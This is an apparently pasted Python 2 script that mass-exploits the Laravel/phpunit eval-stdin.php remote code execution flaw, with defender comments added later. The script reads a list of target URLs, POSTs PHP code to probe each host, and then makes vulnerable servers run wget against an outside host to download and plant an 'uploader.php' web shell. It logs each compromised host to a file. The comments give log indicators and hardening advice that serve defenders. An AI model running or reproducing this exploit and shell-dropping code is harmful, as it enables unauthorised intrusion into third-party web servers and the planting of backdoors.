
Laravel phpunit Remote Code Execution

Jemb0t_IR3eng Jun 19th, 2019 117 Never
  1. import requests as r
  2. import sys
  3. import os
  4. from platform import system
  5.  
  6. if system() == 'Linux':
         # Cosmetic only: clear the operator's terminal before the banner is drawn.
         # The command string is a fixed literal, so nothing external reaches the shell here.
  7.     os.system('clear')
  8. if system() == 'Windows':
  9.     os.system('cls')
  10.  
      # Static banner text; it is printed once at start-up and never sent to a target.
  11. banner = '''
  12. -----------------------
  13. |   Laravel           |
  14. |     phpunit         |
  15. |Remote Code Execution|
  16. |                     |
  17. |  Coded By bL@cKID   |
  18. -----------------------
  19. '''
  20.  
      # Python 2 print statement: the file as posted does not parse under Python 3.
  21. print banner
  22.  
  23. def rce(url):
          # Probe one base URL for a web-reachable phpunit eval-stdin.php and, when the
          # probe answers, try to plant a second-stage PHP file in the same directory.
          # Requests are sent through `requests` with no custom headers and no timeout,
          # so the server sees ordinary POST/GET traffic carrying the library's default
          # User-Agent.
          #
          # Defender notes:
          #  - Log signal: a POST to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
          #    (body beginning with "<?php" where request bodies are captured), followed
          #    by a GET for uploader.php in that directory.
          #  - Host signal: the web-server account spawning wget, and a new uploader.php
          #    appearing under vendor/phpunit/phpunit/src/Util/PHP/.
          #  - Hardening: serve only public/ so vendor/ is not under the document root,
          #    deploy without dev dependencies (`composer install --no-dev`), and keep
          #    phpunit patched.
  24.     try:
              # Fingerprint payload: asks PHP for the OS/kernel identification string.
  25.         cekos = '<?php echo php_uname(); ?>'
              # Second stage: makes the server fetch a remote file with wget and write it
              # as uploader.php (relative path, so wherever the PHP process is running).
              # The staging URL is an indicator to search for in proxy, DNS and egress logs;
              # whether that host was itself compromised cannot be told from this file.
  26.         upshell = '<?php system("wget http://toyotakenya.com/toyotaservice/js/uploader.txt -O uploader.php"); ?>'
  27.         url = url.strip()
  28.         print "[Exploiting] " + url
              # The script expects eval-stdin.php to execute the raw request body as PHP.
  29.         cek = r.post(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=cekos)
              # A response containing 'Linux' is treated as proof of code execution; every
              # other response is reported as "[Not Vuln]", which is therefore not evidence
              # that the endpoint is safe.
  30.         if 'Linux' in cek.text:
  31.             print "[Vuln] " + url
  32.             r.post(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=upshell)
  33.             cekshell = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/uploader.php')
                  # Success marker: presumably the fetched file opens with a GIF header to
                  # pass as an image; the payload itself is not shown on this page.
  34.             if 'GIF89a' in cekshell.text:
  35.                 print "[Shell Uploaded] " + url
                      # Appends the uname output and the uploader URL to a local results file.
                      # The file object is never closed explicitly.
  36.                 open('shell_phpunit.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/uploader.php'+'\n')
  37.             else:
  38.                 print "[Shell not Uploaded]" + url
  39.         else:
  40.             print "[Not Vuln]" + url
          # Bare except discards every failure (DNS, TLS, connection errors, even
          # KeyboardInterrupt), so a host that produced no output line was not
          # necessarily reached at all.
  41.     except:
  42.         pass
  43.  
  44. def main():
          # Batch driver: reads the file named by sys.argv[1] and hands each stripped
          # line to rce() as a base URL, sequentially.
          # Targets come from a list rather than from any check that phpunit is present,
          # so requests for the eval-stdin.php path will also reach hosts that never had
          # it; a 404 for that path in an access log is likely the same kind of sweep.
          # NOTE(review): `list` shadows the builtin and the file handle is never closed.
  45.     list = open(sys.argv[1], 'r').readlines()
  46.     for x in list:
              # rce() already swallows its own exceptions; this second bare except
              # also hides anything raised by the loop body itself.
  47.         try:
  48.             x = x.strip()
  49.             rce(x)
  50.         except:
  51.             pass
  52. if __name__ == "__main__":
          # Expects exactly one argument: the path to a newline-separated list of base URLs.
  53.     if len(sys.argv) < 2:
  54.         print "Usage : python " + sys.argv[0] + " list.txt"
  55.     else:
  56.         main()
      # NOTE(review): this print is at module level, outside the __main__ guard, so it
      # runs after the usage message and on import as well. It does not indicate that
      # anything was written to shell_phpunit.txt.
  57. print "Done, saved to : shell_phpunit.txt"